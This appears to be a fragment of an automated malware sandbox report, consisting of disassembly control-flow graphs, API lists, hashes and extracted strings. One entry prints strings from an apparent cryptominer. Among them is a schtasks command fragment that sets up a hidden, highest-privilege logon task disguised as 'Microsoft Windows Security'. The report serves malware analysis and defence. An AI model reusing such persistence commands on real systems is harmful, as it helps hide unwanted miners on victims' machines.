                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4271482742-0
                                                                                                                                                                                                                                                    • Opcode ID: c245676106b07ba5f835cfbac949db44776c67abb2b41345062639f3736bedb8
                                                                                                                                                                                                                                                    • Instruction ID: 3bf26efdb61c3e1cde8e25e9ebd7e90a7b1878a67466a34045c4829212124184
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c245676106b07ba5f835cfbac949db44776c67abb2b41345062639f3736bedb8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F301C031905BD1EBCB23BF66984975E73A4BF80F29F960016F8046B291CB349D42DBD5

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 285 9e6dcc-9e6ddd call 9e85c4 288 9e6ddf-9e6de6 285->288 289 9e6e54-9e6e59 call 9e8609 285->289 291 9e6e2b 288->291 292 9e6de8-9e6e00 call 9e8ac4 call 9e986b 288->292 294 9e6e2c-9e6e3c HeapFree 291->294 302 9e6e0b-9e6e1b call 9e6e22 292->302 303 9e6e02-9e6e0a call 9e989b 292->303 294->289 296 9e6e3e-9e6e53 call 9e601f GetLastError call 9e5fdd 294->296 296->289 302->289 310 9e6e1d-9e6e20 302->310 303->302 310->294
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __lock.LIBCMT ref: 009E6DEA
                                                                                                                                                                                                                                                      • Part of subcall function 009E8AC4: __mtinitlocknum.LIBCMT ref: 009E8ADA
                                                                                                                                                                                                                                                      • Part of subcall function 009E8AC4: __amsg_exit.LIBCMT ref: 009E8AE6
                                                                                                                                                                                                                                                      • Part of subcall function 009E8AC4: EnterCriticalSection.KERNEL32(?,?,?,009EAD6A,00000004,009EE780,0000000C,009E8B52,009E1165,?,00000000,00000000,00000000,?,009E511C,00000001), ref: 009E8AEE
                                                                                                                                                                                                                                                    • ___sbh_find_block.LIBCMT ref: 009E6DF5
                                                                                                                                                                                                                                                    • ___sbh_free_block.LIBCMT ref: 009E6E04
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,009E1165,009EE620,0000000C,009E8AA5,00000000,009EE6E0,0000000C,009E8ADF,009E1165,?,?,009EAD6A,00000004,009EE780,0000000C), ref: 009E6E34
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,009EAD6A,00000004,009EE780,0000000C,009E8B52,009E1165,?,00000000,00000000,00000000,?,009E511C,00000001,00000214), ref: 009E6E45
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2714421763-0
                                                                                                                                                                                                                                                    • Opcode ID: efe7fa22943a91908b69504fd367f4d86d8484df618c3ba23477a29f9bdea0be
                                                                                                                                                                                                                                                    • Instruction ID: 021937d0e146b34cfb928e701a00069e4be7fffb4e245a9334ae8c9efb2ecc95
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: efe7fa22943a91908b69504fd367f4d86d8484df618c3ba23477a29f9bdea0be
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A01A235805381EADF32BBB3DC0A75E3BA89F54BA5F10041DF104AA0D2DF348D50DA54

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 311 9e673f-9e6748 312 9e675a-9e6761 311->312 313 9e674a-9e6757 call 9e66ad 311->313 314 9e6766 312->314 315 9e6763-9e6764 312->315 313->312 317 9e6769-9e67a2 call 9e2c91 call 9e612a call 9e6392 314->317 315->317 325 9e67ab-9e67ac 317->325 326 9e67a4-9e67a6 call 9e2c58 317->326 326->325
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___BuildCatchObject.LIBCMT ref: 009E6752
                                                                                                                                                                                                                                                      • Part of subcall function 009E66AD: ___BuildCatchObjectHelper.LIBCMT ref: 009E66E3
                                                                                                                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 009E6769
                                                                                                                                                                                                                                                    • ___FrameUnwindToState.LIBCMT ref: 009E6777
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 2163707966-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: 649a1ff7459718f2e3d3456518d9a5961d8fbacca156a18fad0351ff192bb4c7
                                                                                                                                                                                                                                                    • Instruction ID: e68a946262662cfa73c1ad8e3481da3c81b6e024a9b20983c8b948496352f0f0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 649a1ff7459718f2e3d3456518d9a5961d8fbacca156a18fad0351ff192bb4c7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E012431000289BBDF136F52CD85EAE3F6AEF68398F108010BD4814121D736DDA1EBA1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 009E2790
                                                                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 009E27AD
                                                                                                                                                                                                                                                      • Part of subcall function 009E2702: std::runtime_error::runtime_error.LIBCPMT ref: 009E270D
                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 009E27BB
                                                                                                                                                                                                                                                      • Part of subcall function 009E47A8: RaiseException.KERNEL32(?,?,009E4873,009E24A3,?,?,?,?,009E4873,009E24A3,009EE264,009EFDA0,009E24A3,00000000,00000000), ref: 009E47EA
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • invalid string position, xrefs: 009E2795
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionException@8H_prolog3RaiseThrowstd::bad_exception::bad_exceptionstd::runtime_error::runtime_error
                                                                                                                                                                                                                                                    • String ID: invalid string position
                                                                                                                                                                                                                                                    • API String ID: 3299838469-1799206989
                                                                                                                                                                                                                                                    • Opcode ID: 39873f8ba373e324eba8d13957e1c7c3e445b313a652ce80c035a2fe767cf4e5
                                                                                                                                                                                                                                                    • Instruction ID: ae0201709b557185bb465b7fa8d4070c368cded7ae9f092f37f87379d3c513a3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39873f8ba373e324eba8d13957e1c7c3e445b313a652ce80c035a2fe767cf4e5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DD01773940288EACB02E7D2C882FDD737CAB94715F440024F240A6082DBB1AE08CA60
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _malloc.LIBCMT ref: 009E4829
                                                                                                                                                                                                                                                      • Part of subcall function 009E6FEA: __FF_MSGBANNER.LIBCMT ref: 009E700D
                                                                                                                                                                                                                                                      • Part of subcall function 009E6FEA: __NMSG_WRITE.LIBCMT ref: 009E7014
                                                                                                                                                                                                                                                      • Part of subcall function 009E6FEA: HeapAlloc.KERNEL32(00000000,009E1156,00000001,00000000,00000000,?,009E8B08,009E1165,00000001,009E1165,?,009E8A4E,00000018,009EE6E0,0000000C,009E8ADF), ref: 009E7061
                                                                                                                                                                                                                                                    • std::bad_alloc::bad_alloc.LIBCMT ref: 009E484C
                                                                                                                                                                                                                                                      • Part of subcall function 009E47F4: std::exception::exception.LIBCMT ref: 009E4800
                                                                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMTD ref: 009E4860
                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 009E486E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3622535130-0
                                                                                                                                                                                                                                                    • Opcode ID: daa13e7ba89055bf31c8a877ccd7c897b31ee0ae4aecb89041f24e71ec640735
                                                                                                                                                                                                                                                    • Instruction ID: 8431def547b095fd9d42c787c49011ad18d584d88207a1a17b98978772f8c5f9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: daa13e7ba89055bf31c8a877ccd7c897b31ee0ae4aecb89041f24e71ec640735
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49F027308042CA66CB17B763EC1AB4D3B6C9FD0368F104036F810950D2DF71DE448A81
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 009E5DDE
                                                                                                                                                                                                                                                      • Part of subcall function 009E516A: __getptd_noexit.LIBCMT ref: 009E516D
                                                                                                                                                                                                                                                      • Part of subcall function 009E516A: __amsg_exit.LIBCMT ref: 009E517A
                                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 009E5DF5
                                                                                                                                                                                                                                                    • __amsg_exit.LIBCMT ref: 009E5E03
                                                                                                                                                                                                                                                    • __lock.LIBCMT ref: 009E5E13
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3521780317-0
                                                                                                                                                                                                                                                    • Opcode ID: 999b04260c6e5ab60d65d031adad5788b850a78da6228ed352e7e8f71517702a
                                                                                                                                                                                                                                                    • Instruction ID: 721cada425014a7243b08b823f2ccf5cf634b60e1d20d6ae49467e7d787f365a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 999b04260c6e5ab60d65d031adad5788b850a78da6228ed352e7e8f71517702a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2EF09032914FC4EBD723FBA6880674E73A0AF80B18F06456DF4049B2D2DF749E41DA51
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 009E2F8C: __getptd.LIBCMT ref: 009E2F92
                                                                                                                                                                                                                                                      • Part of subcall function 009E2F8C: __getptd.LIBCMT ref: 009E2FA2
                                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 009E64C7
                                                                                                                                                                                                                                                      • Part of subcall function 009E516A: __getptd_noexit.LIBCMT ref: 009E516D
                                                                                                                                                                                                                                                      • Part of subcall function 009E516A: __amsg_exit.LIBCMT ref: 009E517A
                                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 009E64D5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000018.00000002.2041132565.00000000009E1000.00000020.00000001.01000000.00000014.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2041051391.00000000009E0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2042795647.00000000009EC000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044212173.00000000009EF000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000018.00000002.2044631691.00000000009F1000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_24_2_9e0000_2910625892.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 803148776-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: 8a8dffcca61443c03a43e0e0d372c62ca4caf34c30849b0ec3943ea4bff257a1
                                                                                                                                                                                                                                                    • Instruction ID: 34976df995b3d1632f93a7ec3b167b7f35fe9f2ed21531db437cc9c9de09fc2a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a8dffcca61443c03a43e0e0d372c62ca4caf34c30849b0ec3943ea4bff257a1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D50128B4900285CBCF3A9F22C440AADBBF9AF69351F985A2DF04196655CF30CD81CB41
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2779020398.00007FF731CD1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FF731CD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2778986197.00007FF731CD0000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2779057358.00007FF731CEB000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2779486245.00007FF732259000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2779517074.00007FF732262000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2779546227.00007FF732265000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2779578329.00007FF732266000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_7ff731cd0000_winupsecvmgr.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
                                                                                                                                                                                                                                                    • Instruction ID: 42a59a8470c3b10966810a70a6416ba47150a56f769512a3ea23ddecf3e617f0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0EB0926190820AB4E3003BA19841298A2206B14740FA18020C40C02362DAAC50409720

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 0 7ff6ce2085c0-7ff6ce2086b0 call 7ff6ce1fe3d0 call 7ff6ce1fd340 5 7ff6ce2086d6-7ff6ce2086e5 0->5 6 7ff6ce2086b2-7ff6ce2086d1 call 7ff6ce1f14f0 0->6 8 7ff6ce2086eb-7ff6ce208761 wcslen 5->8 9 7ff6ce209d21-7ff6ce209dc7 5->9 6->5 10 7ff6ce20878c-7ff6ce208793 8->10 11 7ff6ce208763-7ff6ce208787 call 7ff6ce1f14f0 8->11 13 7ff6ce208799-7ff6ce208813 10->13 14 7ff6ce20881b-7ff6ce2088db call 7ff6ce1f40a8 call 7ff6ce1f3360 call 7ff6ce1f3c50 memset 10->14 11->10 13->14 21 7ff6ce20890d-7ff6ce20891c 14->21 22 7ff6ce2088dd-7ff6ce208908 call 7ff6ce1f14f0 14->22 24 7ff6ce20895e-7ff6ce20898b 21->24 25 7ff6ce20891e-7ff6ce208956 21->25 22->21 26 7ff6ce2089b6-7ff6ce2089bd 24->26 27 7ff6ce20898d-7ff6ce2089b1 call 7ff6ce1f14f0 24->27 25->24 29 7ff6ce2089fe-7ff6ce208a59 call 7ff6ce1f2b30 call 7ff6ce1f2b00 memset 26->29 30 7ff6ce2089bf-7ff6ce2089f6 26->30 27->26 35 7ff6ce208a8b-7ff6ce208a92 29->35 36 7ff6ce208a5b-7ff6ce208a86 call 7ff6ce1f14f0 29->36 30->29 38 7ff6ce208acd-7ff6ce208b6e call 7ff6ce1f2b00 memset 35->38 39 7ff6ce208a94-7ff6ce208ac6 35->39 36->35 42 7ff6ce208ba0-7ff6ce208ba7 38->42 43 7ff6ce208b70-7ff6ce208b9b call 7ff6ce1f14f0 38->43 39->38 45 7ff6ce208bad-7ff6ce208c67 42->45 46 7ff6ce208c6f-7ff6ce208d17 call 7ff6ce1f2b00 memset 42->46 43->42 45->46 49 7ff6ce208d49-7ff6ce208d61 46->49 50 7ff6ce208d19-7ff6ce208d44 call 7ff6ce1f14f0 46->50 52 7ff6ce208d67-7ff6ce208e16 49->52 53 7ff6ce208e1e-7ff6ce208e5a 49->53 50->49 52->53 54 7ff6ce208e5c-7ff6ce208e80 call 7ff6ce1f14f0 53->54 55 7ff6ce208e85-7ff6ce208e8c 53->55 54->55 57 7ff6ce208edc-7ff6ce208f46 call 7ff6ce1f2b30 call 7ff6ce1f2b00 memset 55->57 58 7ff6ce208e8e-7ff6ce208ed4 55->58 63 7ff6ce208f78-7ff6ce208f87 57->63 64 7ff6ce208f48-7ff6ce208f73 call 7ff6ce1f14f0 57->64 58->57 66 7ff6ce208fe9-7ff6ce209016 63->66 67 7ff6ce208f89-7ff6ce208fe1 63->67 64->63 68 7ff6ce209018-7ff6ce20903c call 7ff6ce1f14f0 66->68 69 7ff6ce209041-7ff6ce209048 66->69 67->66 68->69 71 7ff6ce20904a-7ff6ce209078 69->71 72 7ff6ce20907f-7ff6ce2090e2 call 7ff6ce1f2b30 call 7ff6ce1f2b00 memset 69->72 71->72 77 7ff6ce209114-7ff6ce20911b 72->77 78 7ff6ce2090e4-7ff6ce20910f call 7ff6ce1f14f0 72->78 80 7ff6ce209156-7ff6ce2091bf call 7ff6ce1f2b00 memset 77->80 81 7ff6ce20911d-7ff6ce20914f 77->81 78->77 84 7ff6ce2091f1-7ff6ce2091f8 80->84 85 7ff6ce2091c1-7ff6ce2091ec call 7ff6ce1f14f0 80->85 81->80 87 7ff6ce2091fa-7ff6ce209256 84->87 88 7ff6ce20925e-7ff6ce209283 call 7ff6ce1f2b00 call 7ff6ce1f1ea0 84->88 85->84 87->88 93 7ff6ce2092b0-7ff6ce2092b7 88->93 94 7ff6ce209285-7ff6ce2092ab call 7ff6ce1f14f0 88->94 96 7ff6ce2092b9-7ff6ce2092d8 93->96 97 7ff6ce2092e0-7ff6ce209348 93->97 94->93 96->97 98 7ff6ce20934a-7ff6ce20936e call 7ff6ce1f14f0 97->98 99 7ff6ce209373-7ff6ce20937a 97->99 98->99 101 7ff6ce209380-7ff6ce20941a 99->101 102 7ff6ce209422-7ff6ce2094b1 call 7ff6ce1f3010 99->102 101->102 105 7ff6ce2094b8-7ff6ce2094ce call 7ff6ce1f4051 102->105 108 7ff6ce2094ef-7ff6ce2094f6 105->108 109 7ff6ce2094d0-7ff6ce2094ea call 7ff6ce1f14f0 105->109 111 7ff6ce2094f8-7ff6ce20950b 108->111 112 7ff6ce20950f-7ff6ce20951c _wcsicmp 108->112 109->108 111->112 113 7ff6ce209810-7ff6ce209813 call 7ff6ce1f2a50 112->113 114 7ff6ce209522-7ff6ce209528 112->114 118 7ff6ce209818-7ff6ce20981b 113->118 114->113 115 7ff6ce20952e-7ff6ce209533 call 7ff6ce1f3310 114->115 119 7ff6ce209538-7ff6ce209544 115->119 120 7ff6ce209823-7ff6ce209844 memcpy 118->120 119->120 121 7ff6ce20954a-7ff6ce20954c 119->121 122 7ff6ce209846-7ff6ce209872 memcpy call 7ff6ce1f14f0 120->122 123 7ff6ce209877-7ff6ce20987e 120->123 124 7ff6ce209557-7ff6ce20957b memcpy 121->124 125 7ff6ce20954e-7ff6ce209551 121->125 122->123 127 7ff6ce209a08-7ff6ce209a19 call 7ff6ce1f34f0 123->127 128 7ff6ce209884-7ff6ce209a00 123->128 129 7ff6ce2095a8-7ff6ce2095af 124->129 130 7ff6ce20957d-7ff6ce2095a3 memcpy call 7ff6ce1f14f0 124->130 125->105 125->124 138 7ff6ce209a1b-7ff6ce209a1d 127->138 139 7ff6ce209a23-7ff6ce209a47 memcpy 127->139 128->127 131 7ff6ce209727-7ff6ce20975c call 7ff6ce1f2990 129->131 132 7ff6ce2095b5-7ff6ce209720 129->132 130->129 140 7ff6ce209d02-7ff6ce209d1c call 7ff6ce1f31c0 131->140 141 7ff6ce209762-7ff6ce20976c 131->141 132->131 138->105 138->139 142 7ff6ce209a78-7ff6ce209a7f 139->142 143 7ff6ce209a49-7ff6ce209a73 memcpy call 7ff6ce1f14f0 139->143 140->9 145 7ff6ce20976e-7ff6ce20979e call 7ff6ce1f14f0 141->145 146 7ff6ce2097a3-7ff6ce2097aa 141->146 148 7ff6ce209ae7-7ff6ce209b1e call 7ff6ce1f2990 142->148 149 7ff6ce209a81-7ff6ce209a88 142->149 143->142 145->146 153 7ff6ce2097e8-7ff6ce209808 call 7ff6ce1f2990 146->153 154 7ff6ce2097ac-7ff6ce2097e1 146->154 159 7ff6ce209ce3-7ff6ce209cfd call 7ff6ce1f31c0 148->159 160 7ff6ce209b24-7ff6ce209b8b 148->160 155 7ff6ce209a90-7ff6ce209ab0 149->155 153->105 154->153 155->155 158 7ff6ce209ab2-7ff6ce209adf 155->158 158->148 159->140 162 7ff6ce209b91-7ff6ce209c20 call 7ff6ce1f14f0 160->162 163 7ff6ce209c25-7ff6ce209c2c 160->163 162->163 166 7ff6ce209cc2-7ff6ce209cd9 call 7ff6ce1f2990 163->166 167 7ff6ce209c32-7ff6ce209cbb 163->167 170 7ff6ce209cde 166->170 167->166 170->105
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.3953054160.00007FF6CE1F1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CE1F0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3952978214.00007FF6CE1F0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953160617.00007FF6CE20A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953228157.00007FF6CE20C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE213000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953288791.00007FF6CE215000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.3953425275.00007FF6CE218000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_7ff6ce1f0000_conhost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memset$memcpy$_wcsicmpwcslen
                                                                                                                                                                                                                                                    • String ID: %S /run /tn "Microsoft Windows Security"$%S <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest $0$5RK\E$APPDATA=$SYSTEMROOT=$USERPROFILE=$\BaseNamedObjects\dzemvzqxamm$\BaseNamedObjects\dzemvzqxamm$\BaseNamedObjects\vljmdnomkxppwbqz$\Google\Libs\$\Microsoft Windows Security\winupsecvmgr.exe$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft Windows Security$\System32$\WindowsPowerShell\v1.0\powershell.exe$\cmd.exe$\reg.exe$\schtasks.exe$e; }$eth$xmr
                                                                                                                                                                                                                                                    • API String ID: 1321921031-4262344814
                                                                                                                                                                                                                                                    • Opcode ID: 2e1c1d34a24cbe38c32c3fc8598f4389799938dfa055740cadfb5a8dc442976e
                                                                                                                                                                                                                                                    • Instruction ID: cf335967ee80ef1a8f13045edfc4946259aa7968a4db02ebaa8ff373daa3d80f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e1c1d34a24cbe38c32c3fc8598f4389799938dfa055740cadfb5a8dc442976e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82D29A61C1C6C295F7229F69A6123F573B1BFB1782F055231F9CCA26A2DF2EE6458304

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
